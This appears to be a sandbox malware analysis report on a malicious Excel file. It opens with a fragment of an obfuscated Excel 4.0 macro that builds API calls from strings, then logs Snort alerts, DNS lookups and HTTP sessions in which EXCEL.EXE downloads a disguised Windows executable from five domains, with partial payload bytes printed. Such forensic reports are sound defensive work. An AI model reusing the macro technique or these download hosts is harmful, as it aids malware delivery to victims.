XMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              04/06/21-18:01:05.779242TCP2009897ET TROJAN Possible Windows executable sent when remote host claims to send html content8049169111.118.215.222192.168.2.22

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Apr 6, 2021 18:01:02.122705936 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 18:01:02.161501884 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 18:01:02.161607981 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 18:01:02.162374020 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 18:01:02.244944096 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 18:01:02.568733931 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 18:01:02.568774939 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 18:01:02.569022894 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 18:01:02.569272041 CEST4916580192.168.2.228.211.4.209
              Apr 6, 2021 18:01:02.609659910 CEST80491658.211.4.209192.168.2.22
              Apr 6, 2021 18:01:02.645234108 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 18:01:02.687805891 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 18:01:02.687912941 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 18:01:02.689251900 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 18:01:02.773426056 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 18:01:03.103004932 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 18:01:03.103032112 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 18:01:03.103112936 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 18:01:03.103337049 CEST4916680192.168.2.228.211.4.209
              Apr 6, 2021 18:01:03.143615007 CEST80491668.211.4.209192.168.2.22
              Apr 6, 2021 18:01:03.180855989 CEST4916780192.168.2.22192.185.56.250
              Apr 6, 2021 18:01:03.340634108 CEST8049167192.185.56.250192.168.2.22
              Apr 6, 2021 18:01:03.340747118 CEST4916780192.168.2.22192.185.56.250
              Apr 6, 2021 18:01:03.341989994 CEST4916780192.168.2.22192.185.56.250
              Apr 6, 2021 18:01:03.504129887 CEST8049167192.185.56.250192.168.2.22
              Apr 6, 2021 18:01:03.720449924 CEST8049167192.185.56.250192.168.2.22
              Apr 6, 2021 18:01:03.720530033 CEST8049167192.185.56.250192.168.2.22
              Apr 6, 2021 18:01:03.720664024 CEST4916780192.168.2.22192.185.56.250
              Apr 6, 2021 18:01:03.720741034 CEST4916780192.168.2.22192.185.56.250
              Apr 6, 2021 18:01:03.721364975 CEST4916780192.168.2.22192.185.56.250
              Apr 6, 2021 18:01:03.789477110 CEST4916880192.168.2.22103.211.216.55
              Apr 6, 2021 18:01:03.877712965 CEST8049167192.185.56.250192.168.2.22
              Apr 6, 2021 18:01:03.955492973 CEST8049168103.211.216.55192.168.2.22
              Apr 6, 2021 18:01:03.955655098 CEST4916880192.168.2.22103.211.216.55
              Apr 6, 2021 18:01:03.956880093 CEST4916880192.168.2.22103.211.216.55
              Apr 6, 2021 18:01:04.131800890 CEST8049168103.211.216.55192.168.2.22
              Apr 6, 2021 18:01:04.975133896 CEST8049168103.211.216.55192.168.2.22
              Apr 6, 2021 18:01:04.975301027 CEST8049168103.211.216.55192.168.2.22
              Apr 6, 2021 18:01:04.975364923 CEST4916880192.168.2.22103.211.216.55
              Apr 6, 2021 18:01:04.975779057 CEST4916880192.168.2.22103.211.216.55
              Apr 6, 2021 18:01:04.975795984 CEST4916880192.168.2.22103.211.216.55
              Apr 6, 2021 18:01:05.146706104 CEST8049168103.211.216.55192.168.2.22
              Apr 6, 2021 18:01:05.427691936 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.596868038 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.597033978 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.598428965 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.768717051 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779242039 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779300928 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779339075 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779380083 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779418945 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779468060 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779510975 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779550076 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779583931 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.779589891 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779618979 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.779630899 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.779655933 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.779687881 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.786556959 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.949870110 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.949943066 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.949973106 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950011969 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950050116 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950093031 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950133085 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950174093 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950213909 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950258017 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950306892 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950351954 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950390100 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950428009 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950429916 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.950459003 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950489998 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:05.950692892 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.950716019 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.951245070 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.951256990 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.952370882 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:05.954977036 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.120527029 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120582104 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120624065 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120662928 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120703936 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120743036 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120783091 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.120799065 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120804071 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.120824099 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.120846033 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120886087 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120903015 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.120925903 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120930910 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.120954990 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.120958090 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.120966911 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.120980024 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121009111 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121047974 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121085882 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121093035 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121119022 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121123075 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121138096 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121155977 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121184111 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121186018 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121215105 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121223927 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121264935 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121264935 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121303082 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121305943 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121334076 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121357918 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121360064 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121395111 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121423006 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121429920 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121470928 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121483088 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121509075 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121510983 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121557951 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121566057 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121599913 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121611118 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121633053 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121659994 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121670961 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121702909 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121710062 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.121759892 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.121850014 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.291995049 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.292053938 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:06.292351961 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:06.292382956 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:10.950484037 CEST8049169111.118.215.222192.168.2.22
              Apr 6, 2021 18:01:10.950651884 CEST4916980192.168.2.22111.118.215.222
              Apr 6, 2021 18:01:40.950488091 CEST8049169111.118.215.222192.168.2.22

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Apr 6, 2021 18:01:02.055234909 CEST5219753192.168.2.228.8.8.8
              Apr 6, 2021 18:01:02.110025883 CEST53521978.8.8.8192.168.2.22
              Apr 6, 2021 18:01:02.585011005 CEST5309953192.168.2.228.8.8.8
              Apr 6, 2021 18:01:02.641380072 CEST53530998.8.8.8192.168.2.22
              Apr 6, 2021 18:01:03.118591070 CEST5283853192.168.2.228.8.8.8
              Apr 6, 2021 18:01:03.176975012 CEST53528388.8.8.8192.168.2.22
              Apr 6, 2021 18:01:03.739466906 CEST6120053192.168.2.228.8.8.8
              Apr 6, 2021 18:01:03.785562038 CEST53612008.8.8.8192.168.2.22
              Apr 6, 2021 18:01:04.987745047 CEST4954853192.168.2.228.8.8.8
              Apr 6, 2021 18:01:05.423103094 CEST53495488.8.8.8192.168.2.22

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Apr 6, 2021 18:01:02.055234909 CEST192.168.2.228.8.8.80xd372Standard query (0)katelynn9506a.ru.comA (IP address)IN (0x0001)
              Apr 6, 2021 18:01:02.585011005 CEST192.168.2.228.8.8.80x7032Standard query (0)corwin-tommie06f.ru.comA (IP address)IN (0x0001)
              Apr 6, 2021 18:01:03.118591070 CEST192.168.2.228.8.8.80xad13Standard query (0)kautilyaclasses.comA (IP address)IN (0x0001)
              Apr 6, 2021 18:01:03.739466906 CEST192.168.2.228.8.8.80xb648Standard query (0)kullumanalitours.comA (IP address)IN (0x0001)
              Apr 6, 2021 18:01:04.987745047 CEST192.168.2.228.8.8.80x82b3Standard query (0)bodylanguage.santulan.co.inA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Apr 6, 2021 18:01:02.110025883 CEST8.8.8.8192.168.2.220xd372No error (0)katelynn9506a.ru.com8.211.4.209A (IP address)IN (0x0001)
              Apr 6, 2021 18:01:02.641380072 CEST8.8.8.8192.168.2.220x7032No error (0)corwin-tommie06f.ru.com8.211.4.209A (IP address)IN (0x0001)
              Apr 6, 2021 18:01:03.176975012 CEST8.8.8.8192.168.2.220xad13No error (0)kautilyaclasses.com192.185.56.250A (IP address)IN (0x0001)
              Apr 6, 2021 18:01:03.785562038 CEST8.8.8.8192.168.2.220xb648No error (0)kullumanalitours.com103.211.216.55A (IP address)IN (0x0001)
              Apr 6, 2021 18:01:05.423103094 CEST8.8.8.8192.168.2.220x82b3No error (0)bodylanguage.santulan.co.in111.118.215.222A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • katelynn9506a.ru.com
              • corwin-tommie06f.ru.com
              • kautilyaclasses.com
              • kullumanalitours.com
              • bodylanguage.santulan.co.in

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.22491658.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 18:01:02.162374020 CEST0OUTGET /index.html HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: katelynn9506a.ru.com
              Connection: Keep-Alive
              Apr 6, 2021 18:01:02.568733931 CEST1INHTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 16:01:02 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Content-Length: 78
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
              Data Ascii: <h1>Not Found.</h1>The requested URL /index.html was not found on this server.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.22491668.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 18:01:02.689251900 CEST2OUTGET /index.html HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: corwin-tommie06f.ru.com
              Connection: Keep-Alive
              Apr 6, 2021 18:01:03.103004932 CEST2INHTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 16:01:02 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Content-Length: 78
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
              Data Ascii: <h1>Not Found.</h1>The requested URL /index.html was not found on this server.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.2249167192.185.56.25080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 18:01:03.341989994 CEST3OUTGET /ds/index.html HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: kautilyaclasses.com
              Connection: Keep-Alive
              Apr 6, 2021 18:01:03.720449924 CEST3INHTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 16:01:03 GMT
              Server: Apache
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Encoding: gzip
              Content-Length: 96
              Content-Type: text/html; charset=UTF-8
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 07 72 43 32 52 15 8a 52 0b 4b 53 8b 4b 52 53 14 42 83 7c 14 f4 53 8a f5 33 f3 52 52 2b f4 32 4a 72 73 14 ca 13 8b 15 f2 80 7a d2 40 7a 14 f2 f3 14 4a 32 32 8b 15 8a 53 8b ca 52 8b f4 00 78 ca 54 b8 51 00 00 00
              Data Ascii: 0/Qp/KrC2RRKSKRSB|S3RR+2Jrsz@zJ22SRxTQ


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.2249168103.211.216.5580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 18:01:03.956880093 CEST4OUTGET /ds/index.html HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: kullumanalitours.com
              Connection: Keep-Alive
              Apr 6, 2021 18:01:04.975133896 CEST5INHTTP/1.1 503 Service Unavailable
              Date: Tue, 06 Apr 2021 16:01:04 GMT
              Server: Apache
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Encoding: gzip
              Content-Length: 96
              Content-Type: text/html; charset=UTF-8
              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 07 72 43 32 52 15 8a 52 0b 4b 53 8b 4b 52 53 14 42 83 7c 14 f4 53 8a f5 33 f3 52 52 2b f4 32 4a 72 73 14 ca 13 8b 15 f2 80 7a d2 40 7a 14 f2 f3 14 4a 32 32 8b 15 8a 53 8b ca 52 8b f4 00 78 ca 54 b8 51 00 00 00
              Data Ascii: 0/Qp/KrC2RRKSKRSB|S3RR+2Jrsz@zJ22SRxTQ


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.2249169111.118.215.22280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Apr 6, 2021 18:01:05.598428965 CEST6OUTGET /ds/index.html HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: bodylanguage.santulan.co.in
              Connection: Keep-Alive
              Apr 6, 2021 18:01:05.779242039 CEST7INHTTP/1.1 200 OK
              Date: Tue, 06 Apr 2021 16:01:05 GMT
              Server: nginx/1.17.6
              Content-Type: text/html;charset=UTF-8
              Last-Modified: Tue, 30 Mar 2021 15:21:06 GMT
              Vary: Accept-Encoding
              Content-Encoding: gzip
              X-Server-Cache: true
              X-Proxy-Cache: HIT
              Transfer-Encoding: chunked
              Data Raw: 31 62 30 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 7d 7c 1c 57 79 36 7c c6 5a 25 33 d9 4d 2c a8 f8 36 25 c2 11 30 95 05 4c 57 06 4c 14 b0 52 c6 1f 79 99 58 1f 99 d5 87 23 29 94 08 82 c1 21 84 4c 52 da 67 a1 cb 41 84 c3 74 51 e9 96 16 da d2 2f a5 50 f0 53 1e da a5 90 44 6d d0 ae 3e 56 2b d9 fa 72 c9 07 31 44 36 13 5b 8e 84 b3 49 a6 d6 d8 99 78 9e fb 3e 67 bf 64 f3 7b de f7 fd e7 fd eb dd 9f 34 67 e6 9c 73 5f f7 75 5f d7 65 f4 fd 29 a9 21 84 84 e0 3f 08 08 79 98 88 df 6e f2 7f ff c3 bb d7 bd e5 d1 eb c8 8f 94 63 0d 0f 4b 1f 3e d6 70 db 5d 9f f8 ec f5 f7 dc fb e9 8f df fb 91 c3 d7 7f f4 23 77 df fd e9 fb ae ff fd a1 eb ef b5 ee be fe 13 77 5f ff a1 03 5d d7 1f fe f4 9d 43 ef bc f6 da 6b 6e 28 62 0c 76 87 7f fa a6 f7 0c ad 97 fe bf a1 de bf fe 5a 58 cf bc f6 81 f5 37 c2 da f9 89 8f de 85 fb 97 f7 6e d7 09 f9 b0 54 4b 16 cf 7e ec 8e d2 de 0a d9 d2 10 96 6a 24 f2 65 89 90 37 8a bd 4f 7e 1a 1e 75 f0 ff f7 12 e1 6f f8 be 45 cc 4b 48 65 ad de dc 42 c4 55 7e b7 bc 16 17 c0 b9 13 16 bf 20 91 d7 4b ff 0f 44 fa 7f fb 03 5c ff ff 70 fc ce 8f 82 80 b0 be 38 2c 09 42 38 6b 68 f3 9d eb 09 b9 e3 9d 77 7e e4 be 8f c0 fb 9d 45 ce 7c a8 af 6e 26 bc 1b fe 4a f7 38 d6 0f 8b f7 fe e4 8a 7b e3 ef bc 57 5c 4c 03 38 19 87 f3 b7 c2 fa b5 2b 04 18 2f e1 fd db d5 62 16 22 17 71 2f c3 fb 3f 8c f8 ff ff fe 3f fc 99 ec 59 3a e9 b6 77 74 c6 ba 6f 8a 3f 43 c8 67 64 cd 6e ca b6 91 b5 6b 37 68 78 a2 8d a0 73 6a e6 40 8e e2 e6 1d af 04 41 03 df ae 1c 86 75 ff c6 bf c6 c3 3f dc 9a d3 dd 53 97 82 80 9e 21 6a 5c 5e 53 e8 29 52 a3 cb 81 e1 ee bc e3 42 10 ec c4 cb 89 e7 bf 06 af 4a 1a 8b 87 75 37 47 3f ba d4 46 da 6a 08 d9 f5 ca 67 14 ca bf 82 b5 da c6 1d 70 49 b2 22 b6 e9 6e b7 71 ef 40 e2 08 56 fc 36 e4 9c 0e 79 a4 11 89 6f e8 de e7 e1 5a e2 dc e0 cb 41 a0 65 73 ba 9c 84 e8 ee df a7 4d ef 0b 0c 9f 77 a3 1b 12 6c 2f 07 41 50 8b 9f c3 86 cc 2b e9 f3 c1 f6 31 64 5c db e5 05 c1 b0 ee 0f 73 3e 9a e1 4b 7c f4 c4 f4 06 cc b9 fb 16 c9 94 f7 f2 82 06 4e 82 f2 91 03 31 39 60 06 f4 9c 14 70 59 b4 02 e5 85 24 71 d8 fd 59 2d 29 8a 33 06 63 ed db d0 5d 6c dd b0 d4 fc 17 57 11 1c f9 61 04 dc cd bc c1 81 be de 9e 7c 56 16 06 f8 c2 80 17 ee 22 e4 1e 79 cf 4e 44 5f bb 2a a0 cb f3 00 6e f9 39 dd c7 9d ed 86 4f 0d 9f 04 40 d8 f0 f7 53 cb 97 9a bf 00 03 48 a6 9f 38 f7 5e 78 d9 d0 7d ec b5 5d f7 c3 56 84 f2 e2 80 ce 10 9a 0f e8 90 4f 1a e2 fe 23 7c 7a 3d 22 ed 29 e9 90 d0 fd af 00 61 49 8f a8 46 a4 99 0f b5 02 1a d2 21 99 80 72 88 b6 87 ef ee 51 38 dc 4f b1 6c 27 3e b4 14 7e d7 e2 99 2d 68 6d d7 65 16 8f 6c e8 91 ef 00 60 91 31 1f 36 d0 e5 cd c3 16 d3 f6 48 2f 21 71 39 6a 7f 06 d3 f6 5b d4 7e cb 04 2a 38 14 79 0c 7b 60 6b 69 9e be 28 25 16 f6 6d 41 3c 2e 23 3d ec 4b f4 08 16 80 b1 1e 76 48 cc ff f1 45 58 74 9f 8e f6 cd 42 3d a5 08 23 d1 79 89 f7 2e ee 2a a0 47 9e 34 23 c4 5e 4e 9f cf 2f e9 7e 8e 22 d8 2f 81 71 e3 7b c0 9f 20 9d 9f 69 23 5d e6 ea d3 9f 83 5a c3 95 12 9c dd 14 0c a3 98 fe f6 14 82 41 9e 1f e3 a1 78 a2 f6 24 00 d2 73 81 f6 62 c0 af 05 7a 84 b7 68 98 09 38 ec 06 7f e2 4e e7 ea ec 67 01 9d 7f 07 86 77 c0 06 bd cd c8 76 cb 1d e6 74 81 7e 83 ee ee 51 e6 39 37 e9 3c dd 10 22 6f e8 32 b7 64 3a 60 ba ac e8 72 d8 f0 f6 51 ca 49 70 57 36 cb ea 09 59 95 ef 12 72 9f dc 90
              Data Ascii: 1b01}|Wy6|Z%3M,6%0LWLRyX#)!LRgAtQ/PSDm>V+r1D6[Ix>gd{4gs_u_e)!?yncK>p]#ww_]Ckn(bvZX7nTK~j$e7O~uoEKHeBU~ KD\p8,B8khw~E|n&J8{W\L8+/b"q/??Y:wto?Cgdnk7hxsj@Au?S!j\^S)RBJu7G?FjgpI"nq@V6yoZAesMwl/AP+1d\s>K|N19`pY$qY-)3c]lWa|V"yND_*n9O@SH8^x}]VO#|z=")aIF!rQ8Ol'>~-hmel`16H/!q9j[~*8y{`ki(%mA<.#=KvHEXtB=#y.*G4#^N/~"/q{ i#]ZAx$sbzh8Ngwvt~Q97<"o2d:`rQIpW6Yr
              Apr 6, 2021 18:01:05.779300928 CEST9INData Raw: 3e 0c d7 d6 6a d0 fc 59 52 93 be 7a aa 8d 0c 5b 91 e1 79 d5 8a 34 58 1e 5d 91 80 c7 f0 a5 20 3d b1 d8 46 56 db e3 30 48 9e d4 e8 91 1c c5 ba d7 85 80 86 c7 52 58 c5 c3 a8 cc 0f 6f 68 f1 c8 f0 18 ee 34 e9 1e 9f 73 83 e2 d7 1e f0 a1 d9 80 ef 26 dd
              Data Ascii: >jYRz[y4X] =FV0HRXoh4s&Gp{Z-S;3RUPZ}v\s/;H`z4q}@DC3B%83|hjo<Qdg.FSj5n]`5Un
              Apr 6, 2021 18:01:05.779339075 CEST10INData Raw: f2 22 ae 71 08 11 9d e7 21 aa 9c f9 70 dc 93 74 d9 86 14 9d 97 38 8d 87 91 26 7f 7b f4 cf 2f 14 db 26 78 af d7 82 b5 cd 7b c1 fb c6 9d 17 ca 8e c9 24 46 6f 70 88 b4 c3 b1 d7 e9 64 21 49 13 e0 68 4e 2f 20 40 60 15 a4 90 13 a4 ee 28 b4 91 58 53 8b
